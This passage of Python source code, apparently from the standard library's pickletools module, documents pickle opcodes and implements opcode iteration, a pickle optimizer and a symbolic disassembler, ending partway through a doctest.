unpickles to a Python long. There doesn't seem a real purpose to the
trailing 'L'.
Note that LONG takes time quadratic in the number of digits when
unpickling (this is simply due to the nature of decimal->binary
conversion). Proto 2 added linear-time (in C; still quadratic-time
in Python) LONG1 and LONG4 opcodes.
"""),
I(name="LONG1",
code='\x8a',
arg=long1,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using one-byte length.
A more efficient encoding of a Python long; the long1 encoding
says it all."""),
I(name="LONG4",
code='\x8b',
arg=long4,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using found-byte length.
A more efficient encoding of a Python long; the long4 encoding
says it all."""),
# Ways to spell strings (8-bit, not Unicode).
I(name='STRING',
code='S',
arg=stringnl,
stack_before=[],
stack_after=[pybytes_or_str],
proto=0,
doc="""Push a Python string object.
The argument is a repr-style string, with bracketing quote characters,
and perhaps embedded escapes. The argument extends until the next
newline character. These are usually decoded into a str instance
using the encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='BINSTRING',
code='T',
arg=string4,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 4-byte little-endian
signed int giving the number of bytes in the string, and the
second is that many bytes, which are taken literally as the string
content. These are usually decoded into a str instance using the
encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='SHORT_BINSTRING',
code='U',
arg=string1,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes in the string, and the second is that many
bytes, which are taken literally as the string content. These are
usually decoded into a str instance using the encoding given to
the Unpickler constructor. or the default, 'ASCII'. If the
encoding given was 'bytes' however, they will be decoded as bytes
object instead.
"""),
# Bytes (protocol 3 only; older protocols don't support bytes at all)
I(name='BINBYTES',
code='B',
arg=bytes4,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes, and the second is that many bytes, which are
taken literally as the bytes content.
"""),
I(name='SHORT_BINBYTES',
code='C',
arg=bytes1,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes, and the second is that many bytes, which are taken
literally as the string content.
"""),
I(name='BINBYTES8',
code='\x8e',
arg=bytes8,
stack_before=[],
stack_after=[pybytes],
proto=4,
doc="""Push a Python bytes object.
There are two arguments: the first is a 8-byte unsigned int giving
the number of bytes in the string, and the second is that many bytes,
which are taken literally as the string content.
"""),
# Ways to spell None.
I(name='NONE',
code='N',
arg=None,
stack_before=[],
stack_after=[pynone],
proto=0,
doc="Push None on the stack."),
# Ways to spell bools, starting with proto 2. See INT for how this was
# done before proto 2.
I(name='NEWTRUE',
code='\x88',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push True onto the stack."""),
I(name='NEWFALSE',
code='\x89',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push False onto the stack."""),
# Ways to spell Unicode strings.
I(name='UNICODE',
code='V',
arg=unicodestringnl,
stack_before=[],
stack_after=[pyunicode],
proto=0, # this may be pure-text, but it's a later addition
doc="""Push a Python Unicode string object.
The argument is a raw-unicode-escape encoding of a Unicode string,
and so may contain embedded escape sequences. The argument extends
until the next newline character.
"""),
I(name='SHORT_BINUNICODE',
code='\x8c',
arg=unicodestring1,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 1-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE',
code='X',
arg=unicodestring4,
stack_before=[],
stack_after=[pyunicode],
proto=1,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE8',
code='\x8d',
arg=unicodestring8,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 8-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
# Ways to spell floats.
I(name='FLOAT',
code='F',
arg=floatnl,
stack_before=[],
stack_after=[pyfloat],
proto=0,
doc="""Newline-terminated decimal float literal.
The argument is repr(a_float), and in general requires 17 significant
digits for roundtrip conversion to be an identity (this is so for
IEEE-754 double precision values, which is what Python float maps to
on most boxes).
In general, FLOAT cannot be used to transport infinities, NaNs, or
minus zero across boxes (or even on a single box, if the platform C
library can't read the strings it produces for such things -- Windows
is like that), but may do less damage than BINFLOAT on boxes with
greater precision or dynamic range than IEEE-754 double.
"""),
I(name='BINFLOAT',
code='G',
arg=float8,
stack_before=[],
stack_after=[pyfloat],
proto=1,
doc="""Float stored in binary form, with 8 bytes of data.
This generally requires less than half the space of FLOAT encoding.
In general, BINFLOAT cannot be used to transport infinities, NaNs, or
minus zero, raises an exception if the exponent exceeds the range of
an IEEE-754 double, and retains no more than 53 bits of precision (if
there are more than that, "add a half and chop" rounding is used to
cut it back to 53 significant bits).
"""),
# Ways to build lists.
I(name='EMPTY_LIST',
code=']',
arg=None,
stack_before=[],
stack_after=[pylist],
proto=1,
doc="Push an empty list."),
I(name='APPEND',
code='a',
arg=None,
stack_before=[pylist, anyobject],
stack_after=[pylist],
proto=0,
doc="""Append an object to a list.
Stack before: ... pylist anyobject
Stack after: ... pylist+[anyobject]
although pylist is really extended in-place.
"""),
I(name='APPENDS',
code='e',
arg=None,
stack_before=[pylist, markobject, stackslice],
stack_after=[pylist],
proto=1,
doc="""Extend a list by a slice of stack objects.
Stack before: ... pylist markobject stackslice
Stack after: ... pylist+stackslice
although pylist is really extended in-place.
"""),
I(name='LIST',
code='l',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pylist],
proto=0,
doc="""Build a list out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python list, which single list object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... [1, 2, 3, 'abc']
"""),
# Ways to build tuples.
I(name='EMPTY_TUPLE',
code=')',
arg=None,
stack_before=[],
stack_after=[pytuple],
proto=1,
doc="Push an empty tuple."),
I(name='TUPLE',
code='t',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pytuple],
proto=0,
doc="""Build a tuple out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python tuple, which single tuple object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... (1, 2, 3, 'abc')
"""),
I(name='TUPLE1',
code='\x85',
arg=None,
stack_before=[anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a one-tuple out of the topmost item on the stack.
This code pops one value off the stack and pushes a tuple of
length 1 whose one item is that value back onto it. In other
words:
stack[-1] = tuple(stack[-1:])
"""),
I(name='TUPLE2',
code='\x86',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a two-tuple out of the top two items on the stack.
This code pops two values off the stack and pushes a tuple of
length 2 whose items are those values back onto it. In other
words:
stack[-2:] = [tuple(stack[-2:])]
"""),
I(name='TUPLE3',
code='\x87',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a three-tuple out of the top three items on the stack.
This code pops three values off the stack and pushes a tuple of
length 3 whose items are those values back onto it. In other
words:
stack[-3:] = [tuple(stack[-3:])]
"""),
# Ways to build dicts.
I(name='EMPTY_DICT',
code='}',
arg=None,
stack_before=[],
stack_after=[pydict],
proto=1,
doc="Push an empty dict."),
I(name='DICT',
code='d',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pydict],
proto=0,
doc="""Build a dict out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python dict, which single dict object replaces all of the
stack from the topmost markobject onward. The stack slice alternates
key, value, key, value, .... For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... {1: 2, 3: 'abc'}
"""),
I(name='SETITEM',
code='s',
arg=None,
stack_before=[pydict, anyobject, anyobject],
stack_after=[pydict],
proto=0,
doc="""Add a key+value pair to an existing dict.
Stack before: ... pydict key value
Stack after: ... pydict
where pydict has been modified via pydict[key] = value.
"""),
I(name='SETITEMS',
code='u',
arg=None,
stack_before=[pydict, markobject, stackslice],
stack_after=[pydict],
proto=1,
doc="""Add an arbitrary number of key+value pairs to an existing dict.
The slice of the stack following the topmost markobject is taken as
an alternating sequence of keys and values, added to the dict
immediately under the topmost markobject. Everything at and after the
topmost markobject is popped, leaving the mutated dict at the top
of the stack.
Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
Stack after: ... pydict
where pydict has been modified via pydict[key_i] = value_i for i in
1, 2, ..., n, and in that order.
"""),
# Ways to build sets
I(name='EMPTY_SET',
code='\x8f',
arg=None,
stack_before=[],
stack_after=[pyset],
proto=4,
doc="Push an empty set."),
I(name='ADDITEMS',
code='\x90',
arg=None,
stack_before=[pyset, markobject, stackslice],
stack_after=[pyset],
proto=4,
doc="""Add an arbitrary number of items to an existing set.
The slice of the stack following the topmost markobject is taken as
a sequence of items, added to the set immediately under the topmost
markobject. Everything at and after the topmost markobject is popped,
leaving the mutated set at the top of the stack.
Stack before: ... pyset markobject item_1 ... item_n
Stack after: ... pyset
where pyset has been modified via pyset.add(item_i) = item_i for i in
1, 2, ..., n, and in that order.
"""),
# Way to build frozensets
I(name='FROZENSET',
code='\x91',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pyfrozenset],
proto=4,
doc="""Build a frozenset out of the topmost slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python frozenset, which single frozenset object replaces all
of the stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3
Stack after: ... frozenset({1, 2, 3})
"""),
# Stack manipulation.
I(name='POP',
code='0',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="Discard the top stack item, shrinking the stack by one item."),
I(name='DUP',
code='2',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject, anyobject],
proto=0,
doc="Push the top stack item onto the stack again, duplicating it."),
I(name='MARK',
code='(',
arg=None,
stack_before=[],
stack_after=[markobject],
proto=0,
doc="""Push markobject onto the stack.
markobject is a unique object, used by other opcodes to identify a
region of the stack containing a variable number of objects for them
to work on. See markobject.doc for more detail.
"""),
I(name='POP_MARK',
code='1',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[],
proto=1,
doc="""Pop all the stack objects at and above the topmost markobject.
When an opcode using a variable number of stack objects is done,
POP_MARK is used to remove those objects, and to remove the markobject
that delimited their starting position on the stack.
"""),
# Memo manipulation. There are really only two operations (get and put),
# each in all-text, "short binary", and "long binary" flavors.
I(name='GET',
code='g',
arg=decimalnl_short,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the newline-terminated
decimal string following. BINGET and LONG_BINGET are space-optimized
versions.
"""),
I(name='BINGET',
code='h',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 1-byte unsigned
integer following.
"""),
I(name='LONG_BINGET',
code='j',
arg=uint4,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 4-byte unsigned
little-endian integer following.
"""),
I(name='PUT',
code='p',
arg=decimalnl_short,
stack_before=[],
stack_after=[],
proto=0,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the newline-
terminated decimal string following. BINPUT and LONG_BINPUT are
space-optimized versions.
"""),
I(name='BINPUT',
code='q',
arg=uint1,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 1-byte
unsigned integer following.
"""),
I(name='LONG_BINPUT',
code='r',
arg=uint4,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 4-byte
unsigned little-endian integer following.
"""),
I(name='MEMOIZE',
code='\x94',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=4,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write is the number of
elements currently present in the memo.
"""),
# Access the extension registry (predefined objects). Akin to the GET
# family.
I(name='EXT1',
code='\x82',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
This code and the similar EXT2 and EXT4 allow using a registry
of popular objects that are pickled by name, typically classes.
It is envisioned that through a global negotiation and
registration process, third parties can set up a mapping between
ints and object names.
In order to guarantee pickle interchangeability, the extension
code registry ought to be global, although a range of codes may
be reserved for private use.
EXT1 has a 1-byte integer argument. This is used to index into the
extension registry, and the object at that index is pushed on the stack.
"""),
I(name='EXT2',
code='\x83',
arg=uint2,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT2 has a two-byte integer argument.
"""),
I(name='EXT4',
code='\x84',
arg=int4,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT4 has a four-byte integer argument.
"""),
# Push a class object, or module function, on the stack, via its module
# and name.
I(name='GLOBAL',
code='c',
arg=stringnl_noescape_pair,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
Two newline-terminated strings follow the GLOBAL opcode. The first is
taken as a module name, and the second as a class name. The class
object module.class is pushed on the stack. More accurately, the
object returned by self.find_class(module, class) is pushed on the
stack, so unpickling subclasses can override this form of lookup.
"""),
I(name='STACK_GLOBAL',
code='\x93',
arg=None,
stack_before=[pyunicode, pyunicode],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
"""),
# Ways to build objects of classes pickle doesn't know about directly
# (user-defined classes). I despair of documenting this accurately
# and comprehensibly -- you really have to read the pickle code to
# find all the special cases.
I(name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""),
I(name='BUILD',
code='b',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Finish building an object, via __setstate__ or dict update.
Stack before: ... anyobject argument
Stack after: ... anyobject
where anyobject may have been mutated, as follows:
If the object has a __setstate__ method,
anyobject.__setstate__(argument)
is called.
Else the argument must be a dict, the object must have a __dict__, and
the object is updated via
anyobject.__dict__.update(argument)
"""),
I(name='INST',
code='i',
arg=stringnl_noescape_pair,
stack_before=[markobject, stackslice],
stack_after=[anyobject],
proto=0,
doc="""Build a class instance.
This is the protocol 0 version of protocol 1's OBJ opcode.
INST is followed by two newline-terminated strings, giving a
module and class name, just as for the GLOBAL opcode (and see
GLOBAL for more details about that). self.find_class(module, name)
is used to get a class object.
In addition, all the objects on the stack following the topmost
markobject are gathered into a tuple and popped (along with the
topmost markobject), just as for the TUPLE opcode.
Now it gets complicated. If all of these are true:
+ The argtuple is empty (markobject was at the top of the stack
at the start).
+ The class object does not have a __getinitargs__ attribute.
then we want to create an old-style class instance without invoking
its __init__() method (pickle has waffled on this over the years; not
calling __init__() is current wisdom). In this case, an instance of
an old-style dummy class is created, and then we try to rebind its
__class__ attribute to the desired class object. If this succeeds,
the new instance object is pushed on the stack, and we're done.
Else (the argtuple is not empty, it's not an old-style class object,
or the class object does have a __getinitargs__ attribute), the code
first insists that the class object have a __safe_for_unpickling__
attribute. Unlike as for the __safe_for_unpickling__ check in REDUCE,
it doesn't matter whether this attribute has a true or false value, it
only matters whether it exists (XXX this is a bug). If
__safe_for_unpickling__ doesn't exist, UnpicklingError is raised.
Else (the class object does have a __safe_for_unpickling__ attr),
the class object obtained from INST's arguments is applied to the
argtuple obtained from the stack, and the resulting instance object
is pushed on the stack.
NOTE: checks for __safe_for_unpickling__ went away in Python 2.3.
NOTE: the distinction between old-style and new-style classes does
not make sense in Python 3.
"""),
I(name='OBJ',
code='o',
arg=None,
stack_before=[markobject, anyobject, stackslice],
stack_after=[anyobject],
proto=1,
doc="""Build a class instance.
This is the protocol 1 version of protocol 0's INST opcode, and is
very much like it. The major difference is that the class object
is taken off the stack, allowing it to be retrieved from the memo
repeatedly if several instances of the same class are created. This
can be much more efficient (in both time and space) than repeatedly
embedding the module and class names in INST opcodes.
Unlike INST, OBJ takes no arguments from the opcode stream. Instead
the class object is taken off the stack, immediately above the
topmost markobject:
Stack before: ... markobject classobject stackslice
Stack after: ... new_instance_object
As for INST, the remainder of the stack above the markobject is
gathered into an argument tuple, and then the logic seems identical,
except that no __safe_for_unpickling__ check is done (XXX this is
a bug). See INST for the gory details.
NOTE: In Python 2.3, INST and OBJ are identical except for how they
get the class object. That was always the intent; the implementations
had diverged for accidental reasons.
"""),
I(name='NEWOBJ',
code='\x81',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=2,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple (the tuple being the stack
top). Call these cls and args. They are popped off the stack,
and the value returned by cls.__new__(cls, *args) is pushed back
onto the stack.
"""),
I(name='NEWOBJ_EX',
code='\x92',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[anyobject],
proto=4,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple and by a keyword argument dict
(the dict being the stack top). Call these cls and args. They are
popped off the stack, and the value returned by
cls.__new__(cls, *args, *kwargs) is pushed back onto the stack.
"""),
# Machine control.
I(name='PROTO',
code='\x80',
arg=uint1,
stack_before=[],
stack_after=[],
proto=2,
doc="""Protocol version indicator.
For protocol 2 and above, a pickle must start with this opcode.
The argument is the protocol version, an int in range(2, 256).
"""),
I(name='STOP',
code='.',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="""Stop the unpickling machine.
Every pickle ends with this opcode. The object at the top of the stack
is popped, and that's the result of unpickling. The stack should be
empty then.
"""),
# Framing support.
I(name='FRAME',
code='\x95',
arg=uint8,
stack_before=[],
stack_after=[],
proto=4,
doc="""Indicate the beginning of a new frame.
The unpickler may use this opcode to safely prefetch data from its
underlying stream.
"""),
# Ways to deal with persistent IDs.
I(name='PERSID',
code='P',
arg=stringnl_noescape,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push an object identified by a persistent ID.
The pickle module doesn't define what a persistent ID means. PERSID's
argument is a newline-terminated str-style (no embedded escapes, no
bracketing quote characters) string, which *is* "the persistent ID".
The unpickler passes this string to self.persistent_load(). Whatever
object that returns is pushed on the stack. There is no implementation
of persistent_load() in Python's unpickler: it must be supplied by an
unpickler subclass.
"""),
I(name='BINPERSID',
code='Q',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=1,
doc="""Push an object identified by a persistent ID.
Like PERSID, except the persistent ID is popped off the stack (instead
of being a string embedded in the opcode bytestream). The persistent
ID is passed to self.persistent_load(), and whatever object that
returns is pushed on the stack. See PERSID for more detail.
"""),
]
del I
# Verify uniqueness of .name and .code members.
name2i = {}
code2i = {}
for i, d in enumerate(opcodes):
if d.name in name2i:
raise ValueError("repeated name %r at indices %d and %d" %
(d.name, name2i[d.name], i))
if d.code in code2i:
raise ValueError("repeated code %r at indices %d and %d" %
(d.code, code2i[d.code], i))
name2i[d.name] = i
code2i[d.code] = i
del name2i, code2i, i, d
##############################################################################
# Build a code2op dict, mapping opcode characters to OpcodeInfo records.
# Also ensure we've got the same stuff as pickle.py, although the
# introspection here is dicey.
code2op = {}
for d in opcodes:
code2op[d.code] = d
del d
def assure_pickle_consistency(verbose=False):
copy = code2op.copy()
for name in pickle.__all__:
if not re.match("[A-Z][A-Z0-9_]+$", name):
if verbose:
print("skipping %r: it doesn't look like an opcode name" % name)
continue
picklecode = getattr(pickle, name)
if not isinstance(picklecode, bytes) or len(picklecode) != 1:
if verbose:
print(("skipping %r: value %r doesn't look like a pickle "
"code" % (name, picklecode)))
continue
picklecode = picklecode.decode("latin-1")
if picklecode in copy:
if verbose:
print("checking name %r w/ code %r for consistency" % (
name, picklecode))
d = copy[picklecode]
if d.name != name:
raise ValueError("for pickle code %r, pickle.py uses name %r "
"but we're using name %r" % (picklecode,
name,
d.name))
# Forget this one. Any left over in copy at the end are a problem
# of a different kind.
del copy[picklecode]
else:
raise ValueError("pickle.py appears to have a pickle opcode with "
"name %r and code %r, but we don't" %
(name, picklecode))
if copy:
msg = ["we appear to have pickle opcodes that pickle.py doesn't have:"]
for code, d in copy.items():
msg.append(" name %r with code %r" % (d.name, code))
raise ValueError("\n".join(msg))
assure_pickle_consistency()
del assure_pickle_consistency
##############################################################################
# A pickle opcode generator.
def _genops(data, yield_end_pos=False):
if isinstance(data, bytes_types):
data = io.BytesIO(data)
if hasattr(data, "tell"):
getpos = data.tell
else:
getpos = lambda: None
while True:
pos = getpos()
code = data.read(1)
opcode = code2op.get(code.decode("latin-1"))
if opcode is None:
if code == b"":
raise ValueError("pickle exhausted before seeing STOP")
else:
raise ValueError("at position %s, opcode %r unknown" % (
"<unknown>" if pos is None else pos,
code))
if opcode.arg is None:
arg = None
else:
arg = opcode.arg.reader(data)
if yield_end_pos:
yield opcode, arg, pos, getpos()
else:
yield opcode, arg, pos
if code == b'.':
assert opcode.name == 'STOP'
break
def genops(pickle):
"""Generate all the opcodes in a pickle.
'pickle' is a file-like object, or string, containing the pickle.
Each opcode in the pickle is generated, from the current pickle position,
stopping after a STOP opcode is delivered. A triple is generated for
each opcode:
opcode, arg, pos
opcode is an OpcodeInfo record, describing the current opcode.
If the opcode has an argument embedded in the pickle, arg is its decoded
value, as a Python object. If the opcode doesn't have an argument, arg
is None.
If the pickle has a tell() method, pos was the value of pickle.tell()
before reading the current opcode. If the pickle is a bytes object,
it's wrapped in a BytesIO object, and the latter's tell() result is
used. Else (the pickle doesn't have a tell(), and it's not obvious how
to query its current position) pos is None.
"""
return _genops(pickle)
##############################################################################
# A pickle optimizer.
def optimize(p):
'Optimize a pickle string by removing unused PUT opcodes'
not_a_put = object()
gets = { not_a_put } # set of args used by a GET opcode
opcodes = [] # (startpos, stoppos, putid)
proto = 0
for opcode, arg, pos, end_pos in _genops(p, yield_end_pos=True):
if 'PUT' in opcode.name:
opcodes.append((pos, end_pos, arg))
elif 'FRAME' in opcode.name:
pass
else:
if 'GET' in opcode.name:
gets.add(arg)
elif opcode.name == 'PROTO':
assert pos == 0, pos
proto = arg
opcodes.append((pos, end_pos, not_a_put))
prevpos, prevarg = pos, None
# Copy the opcodes except for PUTS without a corresponding GET
out = io.BytesIO()
opcodes = iter(opcodes)
if proto >= 2:
# Write the PROTO header before any framing
start, stop, _ = next(opcodes)
out.write(p[start:stop])
buf = pickle._Framer(out.write)
if proto >= 4:
buf.start_framing()
for start, stop, putid in opcodes:
if putid in gets:
buf.commit_frame()
buf.write(p[start:stop])
if proto >= 4:
buf.end_framing()
return out.getvalue()
##############################################################################
# A symbolic pickle disassembler.
def dis(pickle, out=None, memo=None, indentlevel=4, annotate=0):
"""Produce a symbolic disassembly of a pickle.
'pickle' is a file-like object, or string, containing a (at least one)
pickle. The pickle is disassembled from the current position, through
the first STOP opcode encountered.
Optional arg 'out' is a file-like object to which the disassembly is
printed. It defaults to sys.stdout.
Optional arg 'memo' is a Python dict, used as the pickle's memo. It
may be mutated by dis(), if the pickle contains PUT or BINPUT opcodes.
Passing the same memo object to another dis() call then allows disassembly
to proceed across multiple pickles that were all created by the same
pickler with the same memo. Ordinarily you don't need to worry about this.
Optional arg 'indentlevel' is the number of blanks by which to indent
a new MARK level. It defaults to 4.
Optional arg 'annotate' if nonzero instructs dis() to add short
description of the opcode on each line of disassembled output.
The value given to 'annotate' must be an integer and is used as a
hint for the column where annotation should start. The default
value is 0, meaning no annotations.
In addition to printing the disassembly, some sanity checks are made:
+ All embedded opcode arguments "make sense".
+ Explicit and implicit pop operations have enough items on the stack.
+ When an opcode implicitly refers to a markobject, a markobject is
actually on the stack.
+ A memo entry isn't referenced before it's defined.
+ The markobject isn't stored in the memo.
+ A memo entry isn't redefined.
"""
# Most of the hair here is for sanity checks, but most of it is needed
# anyway to detect when a protocol 0 POP takes a MARK off the stack
# (which in turn is needed to indent MARK blocks correctly).
stack = [] # crude emulation of unpickler stack
if memo is None:
memo = {} # crude emulation of unpickler memo
maxproto = -1 # max protocol number seen
markstack = [] # bytecode positions of MARK opcodes
indentchunk = ' ' * indentlevel
errormsg = None
annocol = annotate # column hint for annotations
for opcode, arg, pos in genops(pickle):
if pos is not None:
print("%5d:" % pos, end=' ', file=out)
line = "%-4s %s%s" % (repr(opcode.code)[1:-1],
indentchunk * len(markstack),
opcode.name)
maxproto = max(maxproto, opcode.proto)
before = opcode.stack_before # don't mutate
after = opcode.stack_after # don't mutate
numtopop = len(before)
# See whether a MARK should be popped.
markmsg = None
if markobject in before or (opcode.name == "POP" and
stack and
stack[-1] is markobject):
assert markobject not in after
if __debug__:
if markobject in before:
assert before[-1] is stackslice
if markstack:
markpos = markstack.pop()
if markpos is None:
markmsg = "(MARK at unknown opcode offset)"
else:
markmsg = "(MARK at %d)" % markpos
# Pop everything at and after the topmost markobject.
while stack[-1] is not markobject:
stack.pop()
stack.pop()
# Stop later code from popping too much.
try:
numtopop = before.index(markobject)
except ValueError:
assert opcode.name == "POP"
numtopop = 0
else:
errormsg = markmsg = "no MARK exists on stack"
# Check for correct memo usage.
if opcode.name in ("PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"):
if opcode.name == "MEMOIZE":
memo_idx = len(memo)
else:
assert arg is not None
memo_idx = arg
if memo_idx in memo:
errormsg = "memo key %r already defined" % arg
elif not stack:
errormsg = "stack is empty -- can't store into memo"
elif stack[-1] is markobject:
errormsg = "can't store markobject in the memo"
else:
memo[memo_idx] = stack[-1]
elif opcode.name in ("GET", "BINGET", "LONG_BINGET"):
if arg in memo:
assert len(after) == 1
after = [memo[arg]] # for better stack emulation
else:
errormsg = "memo key %r has never been stored into" % arg
if arg is not None or markmsg:
# make a mild effort to align arguments
line += ' ' * (10 - len(opcode.name))
if arg is not None:
line += ' ' + repr(arg)
if markmsg:
line += ' ' + markmsg
if annotate:
line += ' ' * (annocol - len(line))
# make a mild effort to align annotations
annocol = len(line)
if annocol > 50:
annocol = annotate
line += ' ' + opcode.doc.split('\n', 1)[0]
print(line, file=out)
if errormsg:
# Note that we delayed complaining until the offending opcode
# was printed.
raise ValueError(errormsg)
# Emulate the stack effects.
if len(stack) < numtopop:
raise ValueError("tries to pop %d items from stack with "
"only %d items" % (numtopop, len(stack)))
if numtopop:
del stack[-numtopop:]
if markobject in after:
assert markobject not in before
markstack.append(pos)
stack.extend(after)
print("highest protocol among opcodes =", maxproto, file=out)
if stack:
raise ValueError("stack not empty after STOP: %r" % stack)
# For use in the doctest, simply as an example of a class to pickle.
class _Example:
def __init__(self, value):
self.value = value
_dis_test = r"""
>>> import pickle
>>> x = [1, 2, (3, 4), {b'abc': "def"}]
>>> pkl0 = pickle.dumps(x, 0)
>>> dis(pkl0)
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 1
9: a APPEND
10: L LONG 2
14: a APPEND
15: ( MARK
16: L LONG 3
20: L LONG 4
24: t TUPLE (MARK at 15)
25: p PUT 1
28: a APPEND
29: ( MARK
30: d DICT (MARK at 29)
31: p PUT 2
34: c GLOBAL '_codecs encode'
50: p PUT 3
53: ( MARK
54: V UNICODE 'abc'
59: p PUT 4
62: V UNICODE 'latin1'
70: p PUT 5
73: t TUPLE (MARK at 53)
74: p PUT 6
77: R REDUCE
78: p PUT 7
81: V UNICODE 'def'
86: p PUT 8
89: s SETITEM
90: a APPEND
91: . STOP
highest protocol among opcodes = 0
Try again with a "binary" pickle.
>>> pkl1 = pickle.dumps(x, 1)
>>> dis(pkl1)
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 1
6: K BININT1 2
8: ( MARK
9: K BININT1 3
11: K BININT1 4
13: t TUPLE (MARK at 8)
14: q BINPUT 1
16: } EMPTY_DICT
17: q BINPUT 2
19: c GLOBAL '_codecs encode'
35: q BINPUT 3
37: ( MARK
38: X BINUNICODE 'abc'
46: q BINPUT 4
48: X BINUNICODE 'latin1'
59: q BINPUT 5
61: t TUPLE (MARK at 37)
62: q BINPUT 6
64: R REDUCE
65: q BINPUT 7
67: X BINUNICODE 'def'
75: q BINPUT 8
77: s SETITEM
78: e APPENDS (MARK at 3)
79: . STOP
highest protocol among opcodes = 1
Exercise the INST/OBJ/BUILD family.
>>> import pickletools
>>> dis(pickle.dumps(pickletools.dis, 0))
0: c GLOBAL 'pickletools dis'
17: p PUT 0
20: . STOP
highest protocol among opcodes = 0
>>> from pickletools import _Example
>>> x = [_Example(42)] * 2
>>> dis(pickle.dumps(x, 0))
